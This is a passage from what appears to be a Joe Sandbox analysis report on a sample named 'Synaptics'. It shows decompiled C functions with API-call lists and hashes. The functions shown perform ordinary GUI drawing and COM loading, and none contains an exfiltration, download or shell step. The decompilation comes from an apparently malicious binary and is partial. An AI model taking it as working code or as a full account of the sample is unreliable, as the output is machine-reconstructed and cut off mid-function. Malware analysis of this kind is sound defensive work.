                                                                                                                                                                                                                            			}







                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • GetModuleHandleA.KERNEL32(ole32.dll), ref: 0047827E
                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,CoCreateInstanceEx), ref: 0047828F
                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,CoInitializeEx), ref: 0047829F
                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,CoAddRefServerProcess), ref: 004782AF
                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,CoReleaseServerProcess), ref: 004782BF
                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,CoResumeClassObjects), ref: 004782CF
                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,CoSuspendClassObjects), ref: 004782DF
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000009.00000002.407426556.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407417906.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407497738.000000000049B000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407508740.00000000004A5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_9_2_400000_Synaptics.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: AddressProc$HandleModule
                                                                                                                                                                                                                            • String ID: CoAddRefServerProcess$CoCreateInstanceEx$CoInitializeEx$CoReleaseServerProcess$CoResumeClassObjects$CoSuspendClassObjects$ole32.dll
                                                                                                                                                                                                                            • API String ID: 667068680-2233174745
                                                                                                                                                                                                                            • Opcode ID: 7ba8e2c4f0dfdd8fef15a513eba99df2a8458c6260de3b235262294da52c1260
                                                                                                                                                                                                                            • Instruction ID: 1319bd0047e82110eb300eecde3395248effe05b75cadb67779d88dc7b717903
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 7ba8e2c4f0dfdd8fef15a513eba99df2a8458c6260de3b235262294da52c1260
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 16F044F09CE3C02ED30167790CA6A632F689912B0431491BFB808EA5D3C97D4804976E
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            C-Code - Quality: 51%
                                                                                                                                                                                                                            			E00426070(struct HDC__* __eax, void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi) {
                                                                                                                                                                                                                            				void* _v8;
                                                                                                                                                                                                                            				int _v12;
                                                                                                                                                                                                                            				int _v16;
                                                                                                                                                                                                                            				void* _v20;
                                                                                                                                                                                                                            				int _v24;
                                                                                                                                                                                                                            				struct HDC__* _v28;
                                                                                                                                                                                                                            				struct HDC__* _v32;
                                                                                                                                                                                                                            				int _v48;
                                                                                                                                                                                                                            				int _v52;
                                                                                                                                                                                                                            				void _v56;
                                                                                                                                                                                                                            				int _t37;
                                                                                                                                                                                                                            				void* _t41;
                                                                                                                                                                                                                            				int _t43;
                                                                                                                                                                                                                            				void* _t47;
                                                                                                                                                                                                                            				void* _t72;
                                                                                                                                                                                                                            				intOrPtr _t79;
                                                                                                                                                                                                                            				intOrPtr _t80;
                                                                                                                                                                                                                            				void* _t85;
                                                                                                                                                                                                                            				void* _t87;
                                                                                                                                                                                                                            				void* _t88;
                                                                                                                                                                                                                            				intOrPtr _t89;
                                                                                                                                                                                                                            
                                                                                                                                                                                                                            				_t87 = _t88;
                                                                                                                                                                                                                            				_t89 = _t88 + 0xffffffcc;
                                                                                                                                                                                                                            				asm("movsd");
                                                                                                                                                                                                                            				asm("movsd");
                                                                                                                                                                                                                            				_t71 = __ecx;
                                                                                                                                                                                                                            				_v8 = __eax;
                                                                                                                                                                                                                            				_push(0);
                                                                                                                                                                                                                            				L004072E0();
                                                                                                                                                                                                                            				_v28 = __eax;
                                                                                                                                                                                                                            				_push(0);
                                                                                                                                                                                                                            				L004072E0();
                                                                                                                                                                                                                            				_v32 = __eax;
                                                                                                                                                                                                                            				_push(_t87);
                                                                                                                                                                                                                            				_push(0x4261be);
                                                                                                                                                                                                                            				_push( *[fs:eax]);
                                                                                                                                                                                                                            				 *[fs:eax] = _t89;
                                                                                                                                                                                                                            				_t37 = GetObjectA(_v8, 0x18,  &_v56);
                                                                                                                                                                                                                            				if(__ecx == 0) {
                                                                                                                                                                                                                            					_push(0);
                                                                                                                                                                                                                            					L00407638();
                                                                                                                                                                                                                            					_v24 = _t37;
                                                                                                                                                                                                                            					if(_v24 == 0) {
                                                                                                                                                                                                                            						E00425FB8(__ecx);
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            					_push(_t87);
                                                                                                                                                                                                                            					_push(0x42612d);
                                                                                                                                                                                                                            					_push( *[fs:eax]);
                                                                                                                                                                                                                            					 *[fs:eax] = _t89;
                                                                                                                                                                                                                            					_push(_v12);
                                                                                                                                                                                                                            					_push(_v16);
                                                                                                                                                                                                                            					_t41 = _v24;
                                                                                                                                                                                                                            					_push(_t41);
                                                                                                                                                                                                                            					L004072D8();
                                                                                                                                                                                                                            					_v20 = _t41;
                                                                                                                                                                                                                            					if(_v20 == 0) {
                                                                                                                                                                                                                            						E00425FB8(_t71);
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            					_pop(_t79);
                                                                                                                                                                                                                            					 *[fs:eax] = _t79;
                                                                                                                                                                                                                            					_push(0x426134);
                                                                                                                                                                                                                            					_t43 = _v24;
                                                                                                                                                                                                                            					_push(_t43);
                                                                                                                                                                                                                            					_push(0);
                                                                                                                                                                                                                            					L00407888();
                                                                                                                                                                                                                            					return _t43;
                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                            					_push(0);
                                                                                                                                                                                                                            					_push(1);
                                                                                                                                                                                                                            					_push(1);
                                                                                                                                                                                                                            					_push(_v12);
                                                                                                                                                                                                                            					_t47 = _v16;
                                                                                                                                                                                                                            					_push(_t47);
                                                                                                                                                                                                                            					L004072C8();
                                                                                                                                                                                                                            					_v20 = _t47;
                                                                                                                                                                                                                            					if(_v20 != 0) {
                                                                                                                                                                                                                            						_t72 = SelectObject(_v28, _v8);
                                                                                                                                                                                                                            						_t85 = SelectObject(_v32, _v20);
                                                                                                                                                                                                                            						StretchBlt(_v32, 0, 0, _v16, _v12, _v28, 0, 0, _v52, _v48, 0xcc0020);
                                                                                                                                                                                                                            						if(_t72 != 0) {
                                                                                                                                                                                                                            							SelectObject(_v28, _t72);
                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                            						if(_t85 != 0) {
                                                                                                                                                                                                                            							SelectObject(_v32, _t85);
                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            					_pop(_t80);
                                                                                                                                                                                                                            					 *[fs:eax] = _t80;
                                                                                                                                                                                                                            					_push(0x4261c5);
                                                                                                                                                                                                                            					DeleteDC(_v28);
                                                                                                                                                                                                                            					return DeleteDC(_v32);
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            			}
























                                                                                                                                                                                                                            0x00426125
                                                                                                                                                                                                                            0x00426127
                                                                                                                                                                                                                            0x0042612c
                                                                                                                                                                                                                            0x004260ba
                                                                                                                                                                                                                            0x004260ba
                                                                                                                                                                                                                            0x004260bc
                                                                                                                                                                                                                            0x004260be
                                                                                                                                                                                                                            0x004260c3
                                                                                                                                                                                                                            0x004260c4
                                                                                                                                                                                                                            0x004260c7
                                                                                                                                                                                                                            0x004260c8
                                                                                                                                                                                                                            0x004260cd
                                                                                                                                                                                                                            0x00426138
                                                                                                                                                                                                                            0x00426147
                                                                                                                                                                                                                            0x00426156
                                                                                                                                                                                                                            0x0042617d
                                                                                                                                                                                                                            0x00426184
                                                                                                                                                                                                                            0x0042618b
                                                                                                                                                                                                                            0x0042618b
                                                                                                                                                                                                                            0x00426192
                                                                                                                                                                                                                            0x00426199
                                                                                                                                                                                                                            0x00426199
                                                                                                                                                                                                                            0x00426192
                                                                                                                                                                                                                            0x004261a0
                                                                                                                                                                                                                            0x004261a3
                                                                                                                                                                                                                            0x004261a6
                                                                                                                                                                                                                            0x004261af
                                                                                                                                                                                                                            0x004261bd
                                                                                                                                                                                                                            0x004261bd

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • 73C9A590.GDI32(00000000), ref: 00426087
                                                                                                                                                                                                                            • 73C9A590.GDI32(00000000,00000000), ref: 00426091
                                                                                                                                                                                                                            • GetObjectA.GDI32(?,00000018,?), ref: 004260B1
                                                                                                                                                                                                                            • 73C9A410.GDI32(?,?,00000001,00000001,00000000,?,00000018,?,00000000,004261BE,?,00000000,00000000), ref: 004260C8
                                                                                                                                                                                                                            • 73C9AC50.USER32(00000000,?,00000018,?,00000000,004261BE,?,00000000,00000000), ref: 004260D4
                                                                                                                                                                                                                            • 73C9A520.GDI32(00000000,?,?,00000000,0042612D,?,00000000,?,00000018,?,00000000,004261BE,?,00000000,00000000), ref: 00426101
                                                                                                                                                                                                                            • 73C9B380.USER32(00000000,00000000,00426134,00000000,0042612D,?,00000000,?,00000018,?,00000000,004261BE,?,00000000,00000000), ref: 00426127
                                                                                                                                                                                                                            • SelectObject.GDI32(?,?), ref: 00426142
                                                                                                                                                                                                                            • SelectObject.GDI32(?,00000000), ref: 00426151
                                                                                                                                                                                                                            • StretchBlt.GDI32(?,00000000,00000000,?,?,?,00000000,00000000,?,?,00CC0020), ref: 0042617D
                                                                                                                                                                                                                            • SelectObject.GDI32(?,00000000), ref: 0042618B
                                                                                                                                                                                                                            • SelectObject.GDI32(?,00000000), ref: 00426199
                                                                                                                                                                                                                            • DeleteDC.GDI32(?), ref: 004261AF
                                                                                                                                                                                                                            • DeleteDC.GDI32(?), ref: 004261B8
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000009.00000002.407426556.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407417906.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407497738.000000000049B000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407508740.00000000004A5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_9_2_400000_Synaptics.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Object$Select$A590Delete$A410A520B380Stretch
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 956127455-0
                                                                                                                                                                                                                            • Opcode ID: b939bd58d8576efde727da06b39e28273c11fb0ae0a4339bc6659599a28bf24a
                                                                                                                                                                                                                            • Instruction ID: 23bfd75d1e5f7ab71a99e75aee45f16e7152ef54e2d5d773258edcec8bfffe0d
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: b939bd58d8576efde727da06b39e28273c11fb0ae0a4339bc6659599a28bf24a
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 9D411271E04219AFDB10DBE9DC42FAFB7BCEB08704F91446AB604F7281C67869108769
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            C-Code - Quality: 55%
                                                                                                                                                                                                                            			E004424F8(intOrPtr* __eax, intOrPtr __edx) {
                                                                                                                                                                                                                            				intOrPtr* _v8;
                                                                                                                                                                                                                            				intOrPtr _v12;
                                                                                                                                                                                                                            				struct HDC__* _v16;
                                                                                                                                                                                                                            				struct tagRECT _v32;
                                                                                                                                                                                                                            				struct tagRECT _v48;
                                                                                                                                                                                                                            				void* _v64;
                                                                                                                                                                                                                            				struct HDC__* _t120;
                                                                                                                                                                                                                            				void* _t171;
                                                                                                                                                                                                                            				intOrPtr* _t193;
                                                                                                                                                                                                                            				intOrPtr* _t196;
                                                                                                                                                                                                                            				intOrPtr _t205;
                                                                                                                                                                                                                            				void* _t208;
                                                                                                                                                                                                                            				intOrPtr _t216;
                                                                                                                                                                                                                            				signed int _t234;
                                                                                                                                                                                                                            				void* _t237;
                                                                                                                                                                                                                            				void* _t239;
                                                                                                                                                                                                                            				intOrPtr _t240;
                                                                                                                                                                                                                            
                                                                                                                                                                                                                            				_t237 = _t239;
                                                                                                                                                                                                                            				_t240 = _t239 + 0xffffffc4;
                                                                                                                                                                                                                            				_v12 = __edx;
                                                                                                                                                                                                                            				_v8 = __eax;
                                                                                                                                                                                                                            				if( *(_v8 + 0x165) != 0 ||  *(_v8 + 0x16c) > 0) {
                                                                                                                                                                                                                            					_t120 = E00441704(_v8);
                                                                                                                                                                                                                            					_push(_t120);
                                                                                                                                                                                                                            					L00407730();
                                                                                                                                                                                                                            					_v16 = _t120;
                                                                                                                                                                                                                            					_push(_t237);
                                                                                                                                                                                                                            					_push(0x44275e);
                                                                                                                                                                                                                            					_push( *[fs:edx]);
                                                                                                                                                                                                                            					 *[fs:edx] = _t240;
                                                                                                                                                                                                                            					GetClientRect(E00441704(_v8),  &_v32);
                                                                                                                                                                                                                            					GetWindowRect(E00441704(_v8),  &_v48);
                                                                                                                                                                                                                            					MapWindowPoints(0, E00441704(_v8),  &_v48, 2);
                                                                                                                                                                                                                            					OffsetRect( &_v32,  ~(_v48.left),  ~(_v48.top));
                                                                                                                                                                                                                            					ExcludeClipRect(_v16, _v32, _v32.top, _v32.right, _v32.bottom);
                                                                                                                                                                                                                            					asm("movsd");
                                                                                                                                                                                                                            					asm("movsd");
                                                                                                                                                                                                                            					asm("movsd");
                                                                                                                                                                                                                            					asm("movsd");
                                                                                                                                                                                                                            					InflateRect( &_v32,  *(_v8 + 0x16c),  *(_v8 + 0x16c));
                                                                                                                                                                                                                            					asm("movsd");
                                                                                                                                                                                                                            					asm("movsd");
                                                                                                                                                                                                                            					asm("movsd");
                                                                                                                                                                                                                            					asm("movsd");
                                                                                                                                                                                                                            					if( *(_v8 + 0x165) != 0) {
                                                                                                                                                                                                                            						_t208 = 0;
                                                                                                                                                                                                                            						if( *(_v8 + 0x163) != 0) {
                                                                                                                                                                                                                            							_t208 = 0 +  *((intOrPtr*)(_v8 + 0x168));
                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                            						if( *(_v8 + 0x164) != 0) {
                                                                                                                                                                                                                            							_t208 = _t208 +  *((intOrPtr*)(_v8 + 0x168));
                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                            						_t234 = GetWindowLongA(E00441704(_v8), 0xfffffff0);
                                                                                                                                                                                                                            						if(( *(_v8 + 0x162) & 0x00000001) != 0) {
                                                                                                                                                                                                                            							_v48.left = _v48.left - _t208;
                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                            						if(( *(_v8 + 0x162) & 0x00000002) != 0) {
                                                                                                                                                                                                                            							_v48.top = _v48.top - _t208;
                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                            						if(( *(_v8 + 0x162) & 0x00000004) != 0) {
                                                                                                                                                                                                                            							_v48.right = _v48.right + _t208;
                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                            						if((_t234 & 0x00200000) != 0) {
                                                                                                                                                                                                                            							_t196 =  *0x49d970; // 0x49e900
                                                                                                                                                                                                                            							_v48.right = _v48.right +  *((intOrPtr*)( *_t196))(0x14);
                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                            						if(( *(_v8 + 0x162) & 0x00000008) != 0) {
                                                                                                                                                                                                                            							_v48.bottom = _v48.bottom + _t208;
                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                            						if((_t234 & 0x00100000) != 0) {
                                                                                                                                                                                                                            							_t193 =  *0x49d970; // 0x49e900
                                                                                                                                                                                                                            							_v48.bottom = _v48.bottom +  *((intOrPtr*)( *_t193))(0x15);
                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                            						DrawEdge(_v16,  &_v48,  *(0x49bcec + ( *(_v8 + 0x163) & 0x000000ff) * 4) |  *(0x49bcfc + ( *(_v8 + 0x164) & 0x000000ff) * 4),  *(_v8 + 0x162) & 0x000000ff |  *(0x49bd0c + ( *(_v8 + 0x165) & 0x000000ff) * 4) |  *(0x49bd1c + ( *(_v8 + 0x1a5) & 0x000000ff) * 4) | 0x00002000);
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            					IntersectClipRect(_v16, _v48.left, _v48.top, _v48.right, _v48.bottom);
                                                                                                                                                                                                                            					asm("movsd");
                                                                                                                                                                                                                            					asm("movsd");
                                                                                                                                                                                                                            					asm("movsd");
                                                                                                                                                                                                                            					asm("movsd");
                                                                                                                                                                                                                            					OffsetRect( &_v48,  ~_v48,  ~(_v48.top));
                                                                                                                                                                                                                            					FillRect(_v16,  &_v48, E00425610( *((intOrPtr*)(_v8 + 0x170))));
                                                                                                                                                                                                                            					_pop(_t216);
                                                                                                                                                                                                                            					 *[fs:eax] = _t216;
                                                                                                                                                                                                                            					_push(0x442765);
                                                                                                                                                                                                                            					_push(_v16);
                                                                                                                                                                                                                            					_t171 = E00441704(_v8);
                                                                                                                                                                                                                            					_push(_t171);
                                                                                                                                                                                                                            					L00407888();
                                                                                                                                                                                                                            					return _t171;
                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                            					 *((intOrPtr*)( *_v8 - 0x10))();
                                                                                                                                                                                                                            					_t205 = E004329D8(E004328F8());
                                                                                                                                                                                                                            					if(_t205 != 0) {
                                                                                                                                                                                                                            						_t205 = _v8;
                                                                                                                                                                                                                            						if(( *(_t205 + 0x52) & 0x00000002) != 0) {
                                                                                                                                                                                                                            							_t205 = E00432F08(E004328F8(), 0, _v8);
                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            					return _t205;
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            			}





















                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • 73C9B080.USER32(00000000), ref: 0044252C
                                                                                                                                                                                                                            • GetClientRect.USER32 ref: 0044254F
                                                                                                                                                                                                                            • GetWindowRect.USER32 ref: 00442561
                                                                                                                                                                                                                            • MapWindowPoints.USER32 ref: 00442577
                                                                                                                                                                                                                            • OffsetRect.USER32(?,?,?), ref: 0044258C
                                                                                                                                                                                                                            • ExcludeClipRect.GDI32(?,?,?,?,?,?,?,?,00000000,00000000,?,00000002,00000000,?,00000000,?), ref: 004425A5
                                                                                                                                                                                                                            • InflateRect.USER32(?,00000000,00000000), ref: 004425C3
                                                                                                                                                                                                                            • GetWindowLongA.USER32 ref: 00442619
                                                                                                                                                                                                                            • DrawEdge.USER32(?,?,00000000,00000008), ref: 004426E5
                                                                                                                                                                                                                            • IntersectClipRect.GDI32(?,?,?,?,?), ref: 004426FE
                                                                                                                                                                                                                            • OffsetRect.USER32(?,?,?), ref: 0044271D
                                                                                                                                                                                                                            • FillRect.USER32 ref: 00442739
                                                                                                                                                                                                                            • 73C9B380.USER32(00000000,?,00442765,?,?,?,?,?,?,?,?,?,00000000,00000000,?,?), ref: 00442758
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000009.00000002.407426556.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407417906.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407497738.000000000049B000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407508740.00000000004A5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_9_2_400000_Synaptics.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Rect$Window$ClipOffset$B080B380ClientDrawEdgeExcludeFillInflateIntersectLongPoints
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 156109915-0
                                                                                                                                                                                                                            • Opcode ID: a110ff9a93dfc761bce5d57d5e916418852a8b18f182c9e32c65a8a75eeea78d
                                                                                                                                                                                                                            • Instruction ID: af5f50b217af5c554848a1b825971ec4031c124bbe34cabe8649f27ab7cee0d4
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: a110ff9a93dfc761bce5d57d5e916418852a8b18f182c9e32c65a8a75eeea78d
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 48911771E04208AFDB01DBA9C985EEEB7F9AF09314F5440A6F504F7252C779AE40DB64
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            C-Code - Quality: 57%
                                                                                                                                                                                                                            			E00432F08(void* __eax, void* __ecx, intOrPtr __edx) {
                                                                                                                                                                                                                            				intOrPtr _v8;
                                                                                                                                                                                                                            				struct HDC__* _v12;
                                                                                                                                                                                                                            				struct tagRECT _v28;
                                                                                                                                                                                                                            				struct tagRECT _v44;
                                                                                                                                                                                                                            				char _v56;
                                                                                                                                                                                                                            				char _v72;
                                                                                                                                                                                                                            				signed char _t43;
                                                                                                                                                                                                                            				struct HDC__* _t55;
                                                                                                                                                                                                                            				void* _t74;
                                                                                                                                                                                                                            				signed int _t77;
                                                                                                                                                                                                                            				int _t78;
                                                                                                                                                                                                                            				int _t79;
                                                                                                                                                                                                                            				void* _t92;
                                                                                                                                                                                                                            				intOrPtr _t105;
                                                                                                                                                                                                                            				void* _t114;
                                                                                                                                                                                                                            				void* _t117;
                                                                                                                                                                                                                            				void* _t120;
                                                                                                                                                                                                                            				void* _t122;
                                                                                                                                                                                                                            				intOrPtr _t123;
                                                                                                                                                                                                                            
                                                                                                                                                                                                                            				_t120 = _t122;
                                                                                                                                                                                                                            				_t123 = _t122 + 0xffffffbc;
                                                                                                                                                                                                                            				_t92 = __ecx;
                                                                                                                                                                                                                            				_v8 = __edx;
                                                                                                                                                                                                                            				_t114 = __eax;
                                                                                                                                                                                                                            				_t43 = GetWindowLongA(E00441704(_v8), 0xffffffec);
                                                                                                                                                                                                                            				if((_t43 & 0x00000002) == 0) {
                                                                                                                                                                                                                            					return _t43;
                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                            					GetWindowRect(E00441704(_v8),  &_v44);
                                                                                                                                                                                                                            					OffsetRect( &_v44,  ~(_v44.left),  ~(_v44.top));
                                                                                                                                                                                                                            					_t55 = E00441704(_v8);
                                                                                                                                                                                                                            					_push(_t55);
                                                                                                                                                                                                                            					L00407730();
                                                                                                                                                                                                                            					_v12 = _t55;
                                                                                                                                                                                                                            					_push(_t120);
                                                                                                                                                                                                                            					_push(0x433063);
                                                                                                                                                                                                                            					_push( *[fs:edx]);
                                                                                                                                                                                                                            					 *[fs:edx] = _t123;
                                                                                                                                                                                                                            					asm("movsd");
                                                                                                                                                                                                                            					asm("movsd");
                                                                                                                                                                                                                            					asm("movsd");
                                                                                                                                                                                                                            					asm("movsd");
                                                                                                                                                                                                                            					_t117 = _t114;
                                                                                                                                                                                                                            					if(_t92 != 0) {
                                                                                                                                                                                                                            						_t77 = GetWindowLongA(E00441704(_v8), 0xfffffff0);
                                                                                                                                                                                                                            						if((_t77 & 0x00100000) != 0 && (_t77 & 0x00200000) != 0) {
                                                                                                                                                                                                                            							_t78 = GetSystemMetrics(2);
                                                                                                                                                                                                                            							_t79 = GetSystemMetrics(3);
                                                                                                                                                                                                                            							InflateRect( &_v28, 0xfffffffe, 0xfffffffe);
                                                                                                                                                                                                                            							E00419804(_v28.right - _t78, _v28.right, _v28.bottom - _t79,  &_v72, _v28.bottom);
                                                                                                                                                                                                                            							asm("movsd");
                                                                                                                                                                                                                            							asm("movsd");
                                                                                                                                                                                                                            							asm("movsd");
                                                                                                                                                                                                                            							asm("movsd");
                                                                                                                                                                                                                            							_t117 = _t117;
                                                                                                                                                                                                                            							FillRect(_v12,  &_v28, GetSysColorBrush(0xf));
                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            					ExcludeClipRect(_v12, _v44.left + 2, _v44.top + 2, _v44.right - 2, _v44.bottom - 2);
                                                                                                                                                                                                                            					E00432B40( &_v56, 2);
                                                                                                                                                                                                                            					E00432A94(_t117,  &_v56, _v12, 0,  &_v44);
                                                                                                                                                                                                                            					_pop(_t105);
                                                                                                                                                                                                                            					 *[fs:eax] = _t105;
                                                                                                                                                                                                                            					_push(0x43306a);
                                                                                                                                                                                                                            					_push(_v12);
                                                                                                                                                                                                                            					_t74 = E00441704(_v8);
                                                                                                                                                                                                                            					_push(_t74);
                                                                                                                                                                                                                            					L00407888();
                                                                                                                                                                                                                            					return _t74;
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            			}






















                                                                                                                                                                                                                            0x00432fe7
                                                                                                                                                                                                                            0x00432fe8
                                                                                                                                                                                                                            0x00432fe9
                                                                                                                                                                                                                            0x00432ffa
                                                                                                                                                                                                                            0x00432ffa
                                                                                                                                                                                                                            0x00432f9c
                                                                                                                                                                                                                            0x0043301f
                                                                                                                                                                                                                            0x0043302b
                                                                                                                                                                                                                            0x0043303e
                                                                                                                                                                                                                            0x00433045
                                                                                                                                                                                                                            0x00433048
                                                                                                                                                                                                                            0x0043304b
                                                                                                                                                                                                                            0x00433053
                                                                                                                                                                                                                            0x00433057
                                                                                                                                                                                                                            0x0043305c
                                                                                                                                                                                                                            0x0043305d
                                                                                                                                                                                                                            0x00433062
                                                                                                                                                                                                                            0x00433062

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • GetWindowLongA.USER32 ref: 00432F23
                                                                                                                                                                                                                            • GetWindowRect.USER32 ref: 00432F3E
                                                                                                                                                                                                                            • OffsetRect.USER32(?,?,?), ref: 00432F53
                                                                                                                                                                                                                            • 73C9B080.USER32(00000000,?,?,?,00000000,?,00000000,000000EC), ref: 00432F61
                                                                                                                                                                                                                            • GetWindowLongA.USER32 ref: 00432F92
                                                                                                                                                                                                                            • GetSystemMetrics.USER32 ref: 00432FA7
                                                                                                                                                                                                                            • GetSystemMetrics.USER32 ref: 00432FB0
                                                                                                                                                                                                                            • InflateRect.USER32(?,000000FE,000000FE), ref: 00432FBF
                                                                                                                                                                                                                            • GetSysColorBrush.USER32(0000000F), ref: 00432FEC
                                                                                                                                                                                                                            • FillRect.USER32 ref: 00432FFA
                                                                                                                                                                                                                            • ExcludeClipRect.GDI32(?,?,?,?,?,00000000,00433063,?,00000000,?,?,?,00000000,?,00000000,000000EC), ref: 0043301F
                                                                                                                                                                                                                            • 73C9B380.USER32(00000000,?,0043306A,?,?,00000000,00433063,?,00000000,?,?,?,00000000,?,00000000,000000EC), ref: 0043305D
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000009.00000002.407426556.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407417906.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407497738.000000000049B000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407508740.00000000004A5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_9_2_400000_Synaptics.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Rect$Window$LongMetricsSystem$B080B380BrushClipColorExcludeFillInflateOffset
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 3936689491-0
                                                                                                                                                                                                                            • Opcode ID: 6e3feaa59ff7954d7f1e1212010fcca33713d4ca3cef126796b1d2c495fcecae
                                                                                                                                                                                                                            • Instruction ID: 04c1fd49532e7d442bf35e743343acee4fdea8649fd85b2f3a22c1a56fe95c6f
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 6e3feaa59ff7954d7f1e1212010fcca33713d4ca3cef126796b1d2c495fcecae
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: A9415E71E04108ABDB01EAE9CD82EDFB7BDEF49364F100126F904F7291CA78AE418765
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            C-Code - Quality: 88%
                                                                                                                                                                                                                            			E0042CAA8(struct HDC__* _a4, RECT* _a8, _Unknown_base(*)()* _a12, long _a16) {
                                                                                                                                                                                                                            				struct tagPOINT _v12;
                                                                                                                                                                                                                            				int _v16;
                                                                                                                                                                                                                            				struct tagRECT _v32;
                                                                                                                                                                                                                            				struct tagRECT _v48;
                                                                                                                                                                                                                            				void* __ebx;
                                                                                                                                                                                                                            				void* __edi;
                                                                                                                                                                                                                            				void* __esi;
                                                                                                                                                                                                                            				void* __ebp;
                                                                                                                                                                                                                            				void* _t60;
                                                                                                                                                                                                                            				int _t61;
                                                                                                                                                                                                                            				RECT* _t64;
                                                                                                                                                                                                                            				struct HDC__* _t65;
                                                                                                                                                                                                                            
                                                                                                                                                                                                                            				_t64 = _a8;
                                                                                                                                                                                                                            				_t65 = _a4;
                                                                                                                                                                                                                            				if( *0x49e92f != 0) {
